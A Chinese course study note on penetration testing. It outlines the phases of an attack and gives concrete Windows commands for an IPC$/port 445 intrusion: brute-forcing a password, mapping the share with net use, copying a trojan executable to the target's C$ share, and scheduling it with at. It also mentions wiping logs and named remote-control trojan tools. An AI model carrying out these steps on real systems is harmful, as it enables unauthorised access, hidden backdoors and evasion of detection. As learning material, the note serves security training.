千锋教育网络安全学习笔记8-渗透测试

目录

 

渗透测试

 

---

渗透测试

0、授权

1、信息收集

　　nslookup whois

2、扫描漏洞

　　nmap = ip范围 端口号 

　　软件用：scanport

　　高级扫描：如IIS漏洞  2003-IIS6.0   2008-IIS7.0

　　扫描网站漏洞

3、漏洞利用

4、提权（shell（命令行cmd）环境、桌面环境、最高权限）

5、毁尸灭迹（即删除产生的一些日志）

6、制作木马（留后门）

　　软件：灰鸽子远程控制【黑防专版】

　　现在本地做一个可执行文件，然后利用copy命令远程拷贝到服务器上去，在利用at命令设置一个远程定时任务执行可执行文件

7、渗透测试报告

 

手动测试端口号开放与否

telnet IP 地址 测试端口

 445漏洞利用之IPC$：

1、scanport扫描445端口

2、进行暴力破解目标服务器密码

3、

net use 起的别名 \\目标主机IP\IPC$ 目标主机密码  /user:用户
例如：net use f: \\10.1.1.1\IPC$ 123.com /user:admin

net use * /del   删除上述所建

 

4、制作木马

软件：牧民战天兔杀 

5、植入木马（留后门）

copy d:\heihei.exe  \\10.1.1.2\c$

其中d:\heihei.exe为本机生成的木马文件

 

 6、设计计划任务自动执行木马：

net  time  \\10.1.1.2       查看目标主机时间

at  \\10.1.1.2  时间  "c:\heihei.exe"

 

7、等待肉鸡上线